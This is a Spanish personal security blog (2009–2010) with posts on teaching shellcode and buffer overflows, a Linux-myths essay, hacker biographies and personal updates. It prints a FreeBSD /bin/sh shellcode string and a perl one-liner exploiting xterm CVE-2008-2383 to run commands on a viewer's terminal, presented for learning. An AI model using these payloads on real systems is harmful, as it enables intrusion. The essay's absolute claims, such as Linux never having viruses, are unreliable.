In/Seguridad Informatica

shellcode para freebsd

2010-02-14T19:52:00.005-06:00

Esta es la shellcode que mostré en el video "Explicando los shellcode tercera entrega", para linux habría que cambiar el numero de la llamada al sistema, y creo que con eso debería de funcionar, sin embargo tengo entendido que linux usa los registros para colocar los argumentos de la función a llamar, si esto es así, entonces lo que se necesita es un cambio total xDDD

La shellcode es totalmente ineficiente, pero es lo simple que se le puede mostrar aalquien que esta aprendiendo este tema.


char *shellcode = "\xeb\x1c\x5e\x89\x75\x04\x31\xc0\x50\x89\x45\x08\xb0\x3b\x8d\x4d\x04\x51\x56\x50\xcd\x80\x31\xc0\x50\xb0\x01\x50\xcd\x80\xe8\xdf\xff\xff\xff/bin/sh";

Explicando los shellcode tercera entrega

2010-02-13T23:10:00.001-06:00

Bien sobre el tema de los videos de Heuristica y Explotacion de vulnerabilidades he agregado uno nuevo esta es la tercera entrega de "Explicando los shellcode"

Explicando los shellcode 3/5

Se termina de construir un shellcode desde 0 y se muestra la ejecución del mismo.
Se explica brevemente algunas instrucciones, ya que se da por hecho que se conoce algo de ensamblador.

- Anon

xterm 253 DECRQSS Again ??

2010-02-07T00:47:00.001-06:00

Anteriormente había hecho un video sobre un bug en xterm y los DECRQSS

Video - CVE-2008-2383 xterm DECRQSS

Pues parece que la cosa no ha terminado ahi, estado testando un poco con el xterm y los DECRQSS, parece ser no arreglaron bien el bug.

Testeando me han pasado muchas cosas raras, el terminal (xterm) se ha cerrado, ha tratado de ejecutar comandos y bueno muchas cosas de las que se supone no deberían de pasar.

Tengo unas imágenes de PoC, no he podido aislar el código maligno, sin embargo cada vez estoy mas cerca.

Primero la versión del xterm 253 (Actualizado con la ultima versión de ports desde freebsd)

Y después de hacer el cat a un archivo vemos múltiples Command not fount

Lo cual es muestra de que algo va mal.

Les mantendré informados

- Anon

I (L) MySQL!!

2010-01-14T11:55:00.001-06:00

MySQL hace mi trabajo mas fácil xD

Los reportes los entrego en 10 minutos y me quedan 4hrs para divagar por internet

- Anon

Lo siento, pero no tienes acceso a esta página

2010-01-08T18:29:00.001-06:00

ERROR, TU NAVEGADOR ME DICE QUE QUIERES ENTRAR A UN LUGAR PROHIBIDO
// Lo que buscas esta muy lejos de aqui


Para los que sepan de que trata lo anterior, solo me falta atar unas cuantas cosas para resolver el reto.

- Anon

Explicando los shellcode 1/5

2010-01-06T19:09:00.001-06:00

Se explica a continuacion lo que es el shellcode y como construir uno desde cero.

Estén pendientes que faltan otras 4 o 5 entregas.

Saludos

2010!!

2009-12-31T19:35:00.001-06:00

Feliz año nuevo a todos

- Anon

Desbordamiendo de Buffer

2009-12-27T07:20:00.001-06:00

Explicando como esta organizada la memoria de manera parida y simple.

Doy un ejemplo de como sobreescribir variables en la pila, y también un fallo segmento, después se explicara usar estos errores a nuestro favor.

Por el momento este cogido basta para demostrar la idea de sobreescribir valores en la memoria, esto mediante el uso de funciones como strcpy como se muestra aqui

https://foro.elhacker.net/bugs_y_exploits/video_desbordamiento_de_buffer-t279112.0.html

CVE-2008-2383

2009-12-27T07:15:00.001-06:00

Aqui esta el video

xterm DECRQSS Remote Command Execution Vulnerability

Como vemos este es un ejemplo sencillo de lo que se puede hacer con la vulnerabilidad, no se necesita otra cosa mas que un simple archivo, si conocemos de antemano que nuestro objetivo usa xterm en su versión 237 y el comando cat para ver los archivos rápidamente es posible hacer que ejecute comandos que nosotros queramos

Hijo de la gran puta RC1

2009-12-27T07:13:00.001-06:00

Hace mucho que hice el video. Espero y les guste

CVE-2008-2383 xterm DECRQSS

2009-12-25T20:27:00.001-06:00

Esto ya tiene tiempo, sin embargo nunca se hablo de el en el foro y hoy que estoy revisando la versión que yo tengo es vulnerable en mi FreeBSD

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2383
http://www.securityfocus.com/bid/33060/info

El error afecta al parecer a todos los xterm versión 237

por alguna extraña razon el xterm interpreta ciertos caracteres para ejecutar lo que siga a continuacion de ellos.

Código

perl -e 'print "\eP\$q\nid\n\e\\"' > donotcat.txt
 cat donotcat.txt

Como vemos este es un ejemplo sencillo de lo que se puede hacer con la vulnerabilidad, no se necesita otra cosa mas que un simple archivo, si conocemos de antemano que nuestro objetivo usa xterm en su versión 237 y el comando cat para ver los archivos rápidamente es posible hacer que ejecute comandos que nosotros queramos.

- Anon

SAVANNAH: The L Word Subtitles Season 1 English

2009-05-26T22:39:00.001-05:00

OK, great time looking at the English subtitle for this serie, was looking for some that were specific for the torrent to "SAVANNAH". Since most of those I found were desynchronized.

These are perfectly synchronized

The.L.Word.Subtitle.EN.S01.SAVANNAH.zip

MD5
MD5 (The L Word - 1x01-1x02 - Pilot.srt) = 0cebb4493764dd2534777269986a36b4
MD5 (The L Word - 1x03 - Let\'s Do It.srt) = 0c93bf4f3927c5e6c5bba6981fe1b38c
MD5 (The L Word - 1x04 - Longing.srt) = 7291ede41d8c060de028198a3f3d3210
MD5 (The L Word - 1x05 - Lies, Lies, Lies.srt) = 50e8412a51ef4e57ab269ef3a595d1e7
MD5 (The L Word - 1x06 - Lawfully.srt) = 492bc219bb72067adac6ebc10dafa592
MD5 (The L Word - 1x07 - Losing It.srt) = c0e17c9c135fa8325507ad7af579767d
MD5 (The L Word - 1x08 - L\'ennui.srt) = 8e0a7daf76953231922e347d8b40fba2
MD5 (The L Word - 1x09 - Listen Up.srt) = 5e84a7d27ef7abc7d46ffdeaa1c11311
MD5 (The L Word - 1x10 - Luck, Next Time.srt) = d601b4fce25834faec5d4d4cdb0ab280
MD5 (The L Word - 1x11 - Liberally.srt) = 70fbc93d86961ef2e68806b7e94f54d4
MD5 (The L Word - 1x12 - Looking Back.srt) = 2daeb5aaf64acfa931bd33edd9f893a0
MD5 (The L Word - 1x13 - Locked Up.srt) = aed3796fa11d47b1d7fbe7aca8bf2f99
MD5 (The L Word - 1x14 - Limb From Limb.srt) = 4083641b34492c0283aef923332d8de0

SHA1
SHA1 (The L Word - 1x01-1x02 - Pilot.srt) = f14f00d196371bb03882c22bf63e3f6e01811aea
SHA1 (The L Word - 1x03 - Let\'s Do It.srt) = acf62df00bb4b218a30bbaf2cdd022d51f8b5a83
SHA1 (The L Word - 1x04 - Longing.srt) = 409cb39b44c404fe9522e963034df65576b1315e
SHA1 (The L Word - 1x05 - Lies, Lies, Lies.srt) = d652a2ddab525d282830895906fbe06b6ebe85b1
SHA1 (The L Word - 1x06 - Lawfully.srt) = b4428d18002341b319b219f478a98a65804ad2be
SHA1 (The L Word - 1x07 - Losing It.srt) = 4cae7f60b73a3506754572a8e03a9310386b2c23
SHA1 (The L Word - 1x08 - L\'ennui.srt) = 6ed24165996c9ad76a5ecef6431116fa50321384
SHA1 (The L Word - 1x09 - Listen Up.srt) = a285a431c4f65f32eeb2b736d5c94ed1ca0ddfb4
SHA1 (The L Word - 1x10 - Luck, Next Time.srt) = ac0ac4111fcaea4adf29997ab5f96cf00ee2d09d
SHA1 (The L Word - 1x11 - Liberally.srt) = fb1c9c0f2f799a557f95a1d0c323c9f353b1dd95
SHA1 (The L Word - 1x12 - Looking Back.srt) = 40342652c4d49504d370993aa94c9fdee148b9f0
SHA1 (The L Word - 1x13 - Locked Up.srt) = 0a944446761ef34d367f17b6fd5fb5c8874e4cfd
SHA1 (The L Word - 1x14 - Limb From Limb.srt) = 99eebd72954101a290f16fb03ca0c65c6c491aa6

Regards
--
- Anon

De vuelta por el blog. [Pensamientos]

2009-05-16T20:41:00.001-05:00

Pues después de mucho tiempo de no escribir en el blog pienso que volveré a escribir un poco, y contarles el por que de la ausencia.

Pues nada, he conseguido nuevo trabajo y me deja mas cansado que el anterior. El trabajo anterior lo sigo haciendo solo que ahora es desde mi casa y solo voy a la oficina unas dos o tres veces al mes.

Ahora que gano un poco mas de dinero tengo para liquidar mas rápido las deudas y pues tengo mas para ahorrar.

En mi casa he pensado reducir los gastos que hago, me refiero a quitar algunas cosas como la televicion de paga ya que en general muchas veces rondo por todos los canales sin nada que ver. Por eso prefiero mejor descargar las series de televicion que me gustan, asi las disfruto sin comerciales y puedo ponerle los subtitulos que quiera, que generalmente son en ingles para asi poder mejorar mi entendimiento del ingles y la pronunciacion.

Ultimamente es estado un poco nostalgico y deprimido, muchas veces grito de desesperacion. Siento que me falta un poco de motivacion tambien por ello no he actualizado el blog, muchos diran que es por el trabajo nuevo que de hecho el 15 de abril es cuando empeze a trabar ahi, y fue cuando deje de actualizar el blog, sin embargo yo digo que no, el trabajo me gusta y la verdad que el tiempo ahi se me pasa muy rapido, pues todo el dia estoy ocupado.

El trabajo que tengo desde mi casa, pues solo consiste en pasar algunos scripts SQL al MySQL y generar reportes que ya tengo diseñados, de vez en cuando trato de eficientar las consultas ya que el volumen de la informacion crece constantemente y algunas consultas tomas varios minutos que igual no importa mucho pero si es deceable que fuese mas rapido.

He tratado de buscar ayuda psicologica para los problemas de deprecion sin embargo no me atrevo.

Las cosas que antes me entretenian pues ya no me llaman mucho la atencion, el foro se mueve como de costumbre, borrar mensajes de lanzadores, y dudas que ya se han escrito 100 veces (Cosa que no deberia de suceder). NOTA no estoy quemado de moderar el foro, al contrario me divierte mucho ver a esos usuarios en las andadas claro que no duran mucho la mayoria.

Ya no agrada estar tanto tiempo en la computadora, solo esos momentos en los que me encuentro en el IRC con usuarios del foro platicando de una u otra cosa generalmente cosas off-topic. Me divierte mucho y mucho de los usuarios me mantienen animado y echandome animos.

Algunas cosas que detesto

Los defaces
Los mas de 100 usuarios que elimine del msn, por que solo me agreron para preguntarme alguna chorrada sin aportar nada
Aquellas personas que creen que no hay soluciones en OpenSource que superen a las tecnologias de M$

Esto ultimo va por un empleo que rechaze al parecer no hiba a llevar bien con el dueño de la empresa asi que para que arriesgarme con alguien con una mente tan cerrada como esa, claro hay soluciones M$ que son muy buenas ademas de no tener su competencia OpenSource. Sin embargo hay soluciones OpenSource que son insuperables.

En fin, por hoy es todo lo que tengo que decir.

--
- Anon

CVE-2008-0122 Documentación

2009-04-14T09:58:00.002-05:00

Documentación terminada sobre el bug con dicho CVE: CVE-2008-0122.pdf

BoF en inet_network(), afecta a Servidor DNS: BIND
Referencia: CVE-2008-0122

Citar

Pequeño Off-by-One, muy simple y no pude verlo desde el principio, con el analisis que se le dio se comprende del todo el por que del Advisory

Paper: CVE-2008-0122.pdf
Porcentaje: %100
[P]
Saludos
--
- Anon

Documentacion Torneo Shell

2009-04-11T13:19:00.001-05:00

Después de tanto tiempo a continuación se expone la documentación del Torneo de explotacion de servidores o llamado por algunos Torneo Shell debido a que en un principio no se podía encontrar el shell del sistema fácilmente.

Documento sobre los preparativos, desarrollo y desenlace del Wargame
http://warzone.elhacker.net/doc/Howto - TS Warzone.pdf

Documentos que explican como pasar las primeras 3 pruebas del torneo.
http://warzone.elhacker.net/doc/Reto BoF - TS Warzone.pdf
http://warzone.elhacker.net/doc/Reto Dejavu - TS Warzo ne.pdf
http://warzone.elhacker.net/doc/Reto HoF - TS Warzone.pdf

Otro método de pasar el 3er reto del Torneo
http://warzone.elhacker.net/doc/Reto HoF Otro metodo - TS Warzone.pdf

La documentación de la 4ta prueba esta en desarrollo y sera publicada hoy en unas horas mas, o el día de mañana.

Saludos

--
- Anon

Encuesta en Bugs y Exploits

2009-04-05T10:03:00.002-05:00

He creado una encuesta para saber que piensan los usuarios acerca de lo que se puede mejorar en el Subforo de Bug y Exploits en foro.elhacker.net

Encuesta en Bugs y Exploits

Saludos
--
- Anon

GNU/Linux: Mitos y leyendas

2009-04-03T20:09:00.001-06:00

Mitos y Leyendas

Si uno busca en la red, puede encontrar muchos documentos en los cuales gente conocedora hace una comparación objetiva entre Linux y Windows (tanto en servidores como en estaciones de trabajo). En muchos de los documentos se exponen puntos válidos y vigentes en contra de Linux, pero en muchos otros sólo se perpetúan algunos mitos acerca de este sistema operativo. Algunas personas conocieron a Linux en los tiempos del viejo Red-Hat 6.0 y debido a esto todavía creen en ellos. Algunos de estos mitos son:

1.-Si uso Linux me quedaré aislado del resto. Esto es tan falso como los romances de Michael Jackson (con mujeres). Se ha hecho un gran esfuerzo en integrar a Linux a los ambientes corporativos multiplataformas y los resultados son muy satisfactorios. Los sistemas con Linux pueden integrase a un dominio Windows y hacer uso de los recursos compartidos. Se pueden editar archivos de Word y Excel en Linux e imprimirlos en la impresora del XP y viceversa. También se puede revisar Hotmail y usar el Messenger y ICQ en un equipo Linux. De igual manera los PDF y todos los tipos de archivos de imagen, video y audio están soportados, todo sin problemas.

2.-Linux no está estandarizado. De todo los mitos, quizás este es el más infundado. Linux es la plataforma que más busca sujetarse a los estándares. Existen estándares para todo, desde aquellos que definen como se debe comportar un manejador de ventanas hasta el formato de las hojas de cálculo y los desarrolladores de linux son muy respetuosos de apegarse a todas estas reglas.

3.-Sólo un experto programador puede instalar y usar Linux. Otro mito infundado. Cualquier persona puede ser un usuario eficiente de Linux. Si su empresa compra un equipo con Linux pre-instalado, usted encenderá el equipo, usará el quemador, leera sus emails, imprimirá sus documentos, escuchara música, navegara por Internet y al final de día apagará la computadora e ira a casa (Linux es famoso por su gran estabilidad ). Todo ello sin saber una jota de programación.

4.-Linux está bien como juego, pero no para algo serio. Me gustaría saber que opina el ICBC, (el banco más grande de China con fondos que superan los 640 mil millones de dólares y que usa Linux como plataforma). Asímismo me gustaría saber que opina Google, Amazon.com, las automotrices Ford y VolksWagen, la fabricante de aeronaves de la comunidad europea Airbus y los astronautas de la estación orbital (en la cual se usa Linux extensivamente) sobre la opinión de que Linux es un "juego". De cualquer manera es un juego que todos quieren jugar: más de 38 mil millones de dólares en ganancias al año y sigue creciendo.

5.- Linux no genera empleos. "Al no haber facturación por licencias, Linux daña la economía de los países pues no hay impuestos para el gobierno ni hay empresas que pueden crear empleos". En realidad lo que está haciendo Linux es impulsar el desarrollo tecnológico (y la calidad de vida) de los países del tercer mundo: al no haber pago por licencias las empresas de tecnología (incluso las pequeñas) pueden cobrar por los servicios de soporte, personalización y desarollo. Si antes las empresas latinoamericanas solo aspiraban a quedarse con una pequeña fracción del precio de la licencia, ahora pueden pelear por una rebanada más grande del pastel ofreciendo software libre y su experiencia. Hay más trabajo para los programadores locales.

Si los antigüos administradores de Windows sólo sabían apretar una bonita secuencia de botones sin entender lo que pasaba, ahora en Buenos Aires, Santiago y México se están desarrollando verdaderas secciones de código en C o Java a un nivel de complejidad e innovación que hace apenas cinco años era impensable. Eso tiene un mayor impacto en la economía: Brasil e India (dos grandes entusiastas de Linux) se están convirtiendo en los exportadores de software de sus respectivas regiones. Por supuesto que Linux daña la economía, pero no de los países, sino la de una empresa de Redmond, en Washington, USA. .

6.-Linux es feo. Linux ha cambiado mucho, sobre todo en los tres últimos años. Hasta la versión 7.2 de Mandrake, que salió al público a mediados del 2000, Linux o más precisamente, sus escritorios principales, KDE y Gnome, adolecieron de un desarrollo gráfico que fuera al mismo ritmo que su desarrollo técnico. No todo era culpa de los escritorios, un aspecto fundamental del ambiente gráfico, el desplegado de las fuentes, lo realiza el Xserver, y su implementación no era la mejor.

Todo eso cambio al inicio del 2001 con el nuevo KDE y las mejoras al Xserver. Note que estoy hablando del 2001, de esto hace cuatro años. Actualmente Linux posee uno de los entornos gráficos más atractivos de la industria (más atractivo que el de Windows y sólo superado por el MacOSX de Apple). El ambiente gráfico de Linux es también, y por mucho, el más flexible y personalizable. Con frecuencia diseño páginas usando CSS y es una sorpresa para mí ver que en Windows las fuentes pierden definición mientras en Linux se ven nítidas.

Pero todo tiene un precio, linux se dio a conocer en 1994 como el SO más rápido del mundo, lo que era cierto. Esa rapidez, lógicamente, se ha perdido con los escritorios corporativos. No obstante, aún existen los hacker's desktops como Windowmaker, Fluxbox o FVWM, que son entornos funcionales y visualmente atractivos.

7.- En Linux no hay aplicaciones. Aunque hubo el día en que esto era cierto, ahora no pasa de ser un mito. Linux está lleno de programas maduros y totalmente funcionales:

K3B y Nautilus queman CD's y DVD's sin problemas.

Koffice, GnomeOffice y OpenOffice.org son suites de oficina llenas de funciones avanzadas y dotadas de herramientas de integración.

Gnomeeting es compatible con Microsoft NetMeeting si deseamos usar nuestra cámara Web.

Gimp es uno de los mejores editores bitmap y retoque fotográfico del mundo.

Konqueror, Mozilla, Mozilla-Firefox, Epiphany, y Galeon son excelentes navegadores, inmunes al código malicioso de algunos sitios.

Kontact y Evolution manejan nuestra agenda e información personal.

Eclipse, Netbeans y Kdevelop son herramientas gráficas de programación similares a VisualStudio.

Linux está lleno de reproductores multimedia como Mplayer o Xine con el que podemos ver todos los tipos de películas.

Con Quanta y Screem se crean fácilmente páginas Web.

Con Gaim y Kopete tenemos mensajería instantánea.

Usando KmyMoney2, Gnucash o Facturalux, manejamos nuestras finanzas personales o las de una empresa.

Sólo existe dos grupos de programas que actualmente no pueden encontrase muy desarrollados en Linux: juegos y diseño en vectores. Sin embargo, Quake, Doom y Wolfenstein están disponibles para linux e Inkscape es un buen editor de imágenes vectoriales.

8.-Linux es gratis y por tanto, lo que se haga en él no se puede cobrar. Doblemente Falso. Linux no es gratis, que no se deba gastar en la licencia no significa que no habrá otros costos, como la capacitación y el tiempo en investigación de soluciones. El costo Total de Propiedad o TOC por sus siglas en inglés, suma los costos totales por implementar y sostener un sistema operativo. En términos generales, Linux es un 30% más barato que Windows, y ese porcentaje de ahorro aumenta año con año, pero eso no significa que Linux no requiera inversión.

Por otro lado, la licencia GPL no prohíbe cobrar por lo que se haga en Linux, de hecho, en la facturas se cobra por la instalación, configuración y en su caso, programación de software libre.

9.-Linux es difícil de manejar. Repita tres veces conmigo ?Ningún sistema operativo es fácil de usar?. Tres anécdotas para el caso:

1. Una vez arregle un computadora para un pequeño despacho. Como suelo hacer en estos casos, primero respaldé todo el disco duro, luego formatee el disco y reinstale el SO con los programas (todos los usuarios de Windows saben a lo que me refiero pues lo deben hacer cada año, quiéranlo o no). Al final copié las carpetas de regreso,comprobé que todo funcionaba y regrese el equipo. Tres horas después un iracundo arquitecto me reclamaba que todos sus archivos se habían perdido, que yo los había borrado y que todos eran importantísimos. Fui muy preocupado a verlo pues me gusta ser serio en mi trabajo, al llegar me explicaron: ?todo se había perdido? según ellos, porqué la carpeta ?Proyectos? del ?papel tapiz? no estaba. En realidad la carpeta en C:/Mis documentos/Proyectos no tenía un acceso directo al escritorio y como no estaba allí, pues no existía. Alguien había hecho ese acceso directo años atrás y era la única manera que conocían para llegar a ellos, además de los archivos recientes del menú ?File? de Excel. En esa misma empresa había una secretaria que se jactaba de usar la muy avanzada tecla tab para dar formato a los documentos de Word en lugar de dar muchos espacios.

2. Luego de una acalorada discusión, le aposté a un colega una comida si era capaz de encontrar, en el piso donde trabajábamos, tres personas que supiesen cambiar el IRQ de su mouse. Vale la pena mencionar el hecho de que el piso era de un banco, donde trabajaban más de cincuenta graduados universitarios. Ese día comí gratis.

3. Hace cosa de un mes, una vecina vino a pedirme de favor si podía descargar e imprimir un documento Word que le habían enviado por hotmail, en ese momento yo estaba usando KDE. Ella abrió Mozilla, entró a hotmail, al descargar el archivo, Mozilla sugirió OpenOffice.org ella dijo OK, el archivo sólo era de dos hojas, cambio unos títulos y las palabras que el corrector ortográfico le marco, dio un clíck en imprimir, redacto la respuesta en hotmail, se puso de pié para marcharse con su impresión, en la puerta me dijo ?que raro windows?, luego me dio las gracias y se marchó. Ella había usado Linux sin siquiera darse cuenta. Por supuesto, todo salió bien porque el quipo estaba correctamente configurado, como si fuese un equipo OEM de fábrica.

No es que Linux sea difícil y Windows fácil, lo que pasa es que nosotros somos la primera generación de usuarios y lo que encontramos fue Windows, si hubiese sido MacOS o NeXT u OS/2 hubiésemos aprendido a batallar con eso, pero en realidad Windows o Linux poseen el mismo grado de dificultad.

10.-En el software libre no hay innovación. La mejor innovación que han hecho los sistemas abiertos es el mismo Internet: el protocolo TCP/IP, que le da vida a la red, fue desarrollado por el equipo BSD de Berkeley y fue liberado bajo la BSD License, mientras el deficiente protocolo NetBeui ha sido abandonado. También fue en el software libre donde se dió la primer CLI (Common Lenguaje Interface) que fue Jython, años antes que el tardió .NET de Microsoft. Los Weblogs también son una innovación libre. El respaldo distribuido de información y sistemas de monitoreo de redes están también entre las muchas innovaciones libres.

11.- Todo mundo puede ver el código de los programas libres y por eso son inseguros. En realidad, pasa todo lo contrario. Existen dos tipos de esquemas de seguridad: la tipo plaza pública en la cual todo mundo puede ver los detalles de un programa y cuando encuentra una falla avisa a todo mundo y la tipo torre de marfil donde sólo un reducido grupo puede ver el programa y cuando encuentra una falla no avisa a nadie. Al ser revisados por muchas personas y hacer públicas las fallas, es difícil que una error grave no sea detectado en un programa de software libre. En los programas torre de marfil, en cambio, las fallas pasan desapercibidas por el pequeño grupo y cuando la encuentran no avisan. En todo caso, y quizás esto es más grave, la respuesta de los programas torre de marfil es muy lenta, arreglar un grave fallo de seguridad puede tardar meses sin que los usuarios estén conscientes del peligro que corren, como ya ha pasado en varias ocasiones con Windows 2000 y XP. En la plaza pública, al ser dada a conocer una vulnerabilidad, uno puede decidir continuar con ese programa o reemplazarlo por otro que cumpla la misma función. En la torre de marfil uno no tiene esa libertad.

12.- El software libre es comunista. No hay ninguna razón por la cual desarrollar software libre vaya en contra de las reglas del mercado. De hecho, el software libre se ha revelado como un modelo de negocios novedoso y que reporta miles de millones de dólares cada año. IBM, SUN, Computer Associates y Novell son empresas que han descubierto en el SL una manera de abrir el mercado ahí donde estaba copado y han dado nuevos bríos e innovaciones a la industria. Linus Torvald quizás no sea tan rico como BIll Gates, pero ciertamente su fortuna se calcula en millones de dólares y tengo serias dudas de que este planeando donarlos a la revolución cubana.

13.- No hay virus en Linux porque poca gente lo usa. Durante décadas, Unix fue el único sistema operativo que estaba disponible, su cuota de mercado era del 99%. Durante todo ese tiempo nunca hubo un virus. Los virus aprecieron al sumar Windows + Internet. Hay quienes dicen que Windows no es un sistema operativo verdadero, sino un "gestionador promiscuo de memoria y ejecutables". Cuando una archivo llega a Linux (por Internet o porque se copia de un CD) no puede ejecutarse porque no posee permisos y aunque los tuviese, no puede activar ningún servicio porque no es dueño del demonio que lo ejecuta. Esto revela un sistema operativo maduro y bien diseñado. Existen otros peligros para Linux como los troyanos o algún exploit pero por cada uno de ellos hay miles de virus. Concluyendo: en Linux (como en todos los Unix) nunca habrá virus.

14.- En linux no hay soporte. Este mito ha sido despedazado por el último reporte de ganancias trimestrales de IBM: 27.700 millones de dólares (casi el triple que Microsoft). La mayoría de este dinero proviene de servicios y soporte para Linux. EL software libre ha revolucionado el mercado: ya no se venden licencias, se venden las consultorías y el Know how. Esto ha beneficiado a las empresas pequeñas de cada país, que pueden competir dando soporte a Linux a precios muy razonables. De esta manera el dinero que se iba al norte por el estéril pago de licencias, se queda en cada país por pago de servicios.

15.- Linux no le quita mercado a Windows, sino a Unix. Si bien es cierto que Linux ha jubilado a AIX de IBM y Solaris de SUN. Lo cierto es que muchas migraciones Unix->Windows se han visto canceladas en beneficio de las nuevas Unix->Linux. El modesto crecimiento de los servidores con Windows Server 2003 durante los dos útimos años es debido a que Linux se ha convertido en la gran opción de muchas empresas que gustan de Unix pero lo encontraban muy costoso. Las únicas razones por las cuales la gente sigue instalando servidores con Windows es por pereza o por ignorancia.

--
- Anon

Hackers

2009-04-01T10:45:00.001-06:00

Estos son los hackers mas famosos de los ultimos años

Robert Tappan Morris hijo de Robert Thomas Morris uno de los precursores de los virus y recién graduado en Computer Science en la Universidad de Cornell, en 1988 difundió un virus a través de ArpaNet, (precursora de Internet) logrando infectar 6,000 servidores conectados a la red. La propagación la realizó desde uno de los terminales del MIT (Instituto Tecnológico de Massachussets). ArpaNet empleaba el UNIX, como sistema operativo. Robert Tappan Morris al ser descubierto, fue enjuiciado y condenado en la corte de Syracuse, estado de Nueva York, a 4 años de prisión y el pago de US $ 10,000 de multa, pena que fue conmutada a libertad bajo palabra y condenado a cumplir 400 horas de trabajo comunitario.

Kevin David Mitnick es el más famoso hackers de los últimos tiempos. Nacido el 6 de Agosto de 1963 en Van Nuts, California, desde muy niño sintió curiosidad por los sistemas de comunicación electrónica y fue cultivando un obsesivo deseo por investigar cosas y lograr objetivos aparentemente imposibles, hasta llegar a poseer una genial habilidad para ingresar a servidores sin autorización, robar información, interceptar teléfonos, crear virus, etc. Cuando en 1992 el gobierno acusó a Kevin de haber substraído información del FBI, relacionada a la investigación de Ferdinand Marcos y de haber penetrado en computadoras militares, el se convirtió en un símbolo entre la comunidad internacional de hackers, después de que el FBI lo investigara y persiguiera infructuosamente durante tres años, y cuya captura se produjo en 1995, cuando los investigadores rastrearon sus huellas hasta llegar a un departamento en Raleigh, en Carolina del Norte. Mitnick fue arrestado por el FBI en Raleigh, North Carolina, el 15 de Febrero de 1995. Mitnick, quién fue liberado en Enero del 2000, después de permanecer casi 5 años en un prisión federal, le costó al estado norteamericano y a empresas privadas, millones de dólares al ser objeto de hurto de su software, información y alteración de los datos de las mismas. Entre los agraviados se incluyen corporaciones tales como Motorola, Novell, Nokia y Sun Microsystems, el FBI, el Pentágono y la Universidad de Southern California.

Mark Abene más conocido como Phiber Optik, con tan solo 17 años se convirtió en un genio de la computación y de la tecnología telefónica. Lasprimeras computadoras usadas por Abene fueron una Apple II, la Timex Sinclair y una Commodore 64. Aunque el primer equipo de Mark fue una Radio Shack TSR 80, también tenía un receptor telefónico tantas veces usado, que tenía una cinta plástica enrrollada para sostener sus partes internas, desgastadas por el excesivo uso. Mark Abene era un experto en patrones de discado en receptores telefónicos. Lideró en New York, al grupo de hackers denominado "Master of Deception", MOD (Maestros de la Decepción). En Noviembre de 1989, hizo colapsar las computadoras de WNET, uno de los principales canales de televisión de la ciudad de New York, dejando un mensaje "Happy Thanksgiving you turkeys, from all of us at MOD" (Feliz Día de Acción de Gracias a Uds. pavos, de parte de todos nosotros en MOD). Una revista de New York lo catalogó, como "una de las 100 personas más inteligentes de la nación". En Julio de 1992, Abene y cuatro miembros de MOD fueron arrestados por una serie de cargos criminales. Abene se declaró culpable de los cargos federales de acceso desautorizado a computadoras de la compañia de teléfonos, incursión a computadoras y conspiración. Mark Abene pasó 10 meses en la prisión del condado Schuylkill de Pennsylvania, donde recibió tantas visitas y concedió entrevistas a periodistas y reporteros de canales de televisión, que sus compañeros de celda los apodaron CNN. Al negársele el uso de una computadora mientras estuvo en prisión, Mark Abene se convirtió en un héroe muy popular. Al salir en libertad fue empleado por su amigo Stacy Horn, del BBS denominado ECHO. Las hazañas de Abene le dieron tanta fama, que inspiraron a Michelle Slatalla y Joshua Quittne a escribir un libro titulado "The Gang That Ruled Cyberspace" (La Banda que dominó el Ciberespacio).

Johan Helsingius Responsable de uno de los más famosos servidores de mail anónimo. Fue preso por recusarse a dar información sobre un acceso que publicó documentos secretos de Church of Scientology en Internet. Tenía para eso un 486 con HD de 200Mb, y nunca preciso usar su propio servidor. El objetivo de un remailer anónimo es proteger la identidad del usuario. El servidor Remailer, no almacena los mensajes sino que sirve como un canal de re-transmisión de los mismos. El Remailer re-envía estos mensajes, sin dar a conocer la identidad del remitente original.

Chen Ing-Hou es el creador del virus CIH, que lleva sus propias iniciales. Manifiesta que siente mucho por los graves daños causados por su creación viral, pero que ello fue motivado por una venganza en contra de los que llamó "incompetentes desarrolladores de software antivirus". Chen Ing-Hou nació en la ciudad de Kaohsiung, Taipei o Taibei, capital y principal ciudad de Taiwan, y creó su famoso virus en Mayo de 1998, al cual denominó Chernobyl, en conmemoración del 13 aniversario de la tragedia ocurrida en la planta nuclear rusa. Actualmente trabaja como experto en Internet Data Security.

Sir Dystic es el hacker autor del programa original Back Orifice, lanzado en 1998, da a conocer el lanzamiento de su nueva versión para Windows 2000 y NT. El primer lanzamiento de su sistema Back Orifice fue infectado con el virus CHI y ello dio motivo a que Sir Dystic anunciara que desarrollaría un antivirus denominado CDC Protector y otro que protegería a los sistema de los troyanos, denominado CDC Monitor.

David L. Smith el 8 de Abril de 1999, David L. Smith, de 30 años, natural de Aberdeen, New Jersey y sospechoso de ser el autor del virus Melissa hizo su primera aparición en público en la Corte Superior del condado de Monmouth para escuchar las acusaciones en su contra. Smith permaneció silencioso y cabizbajo cuando escuchó los cargos. Ante el Juez John Riccardi David Smith dijo: "Sí, yo admito esos sucesos ocurridos como resultado de la propagación del virus Melissa. Pero yo no esperaba o anticipé la enorme cantidad de daño que ocasionó. Cuando difundí el virus yo supuse que algún daño material sería menor e incidental. De hecho, yo incluí instrucciones diseñadas para prevenir un daño substancial. No tuve idea de que habrían profundas consecuencias en contra de otros".

Reonel Ramones de 27 años, empleado bancario, quien vivía con su hermana y su novia Irene de Guzmán de 23, fueron acusados de ser los autores del virus LoveLetter, el mismo que según algunas evidencias, habría empezado como un conjunto de rutinas para penetrar en otros sistemas, con el objeto de sustraer la información de tarjetas de crédito de terceros. Las evidencias apuntaron a Reonel Ramonez, como cabeza del grupo que participó en la creación y difusión de este virus. Una corporación holandesa lo contrató con un sueldo muy atractivo, por considerarlo muy hábil y capaz en el desarrollo de sistemas de seguridad en Redes e Internet.

Vladimir Levin graduado en matemáticas de la Universidad Tecnológica de San Petesburgo, Rusia, fue acusado y preso por la Interpol después de meses de investigación por ser la mente maestra de una serie de fraudes tecnológicos que le permitieron a él y la banda que conformaba, substraer más de 10 millones de dólares, de cuentas corporativas del Citibank. Insiste en la idea de que uno de los abogados contratado para defenderlo es, en verdad, un agente del FBI. A pesar de que la banda substrajo más de 10 millones de dólares al Citibank, Levin fue sentenciado a 3 años de prisión y a pagar la suma de US $ 240,015 a favor del Citibank, ya que las compañías de seguros habían cubierto los montos de las corporaciones agraviadas.Los técnicos tuvieron que mejorar sus sistemas de seguridad contra "crackers" y Vladimir Levin ahora se encuentra en libertad.

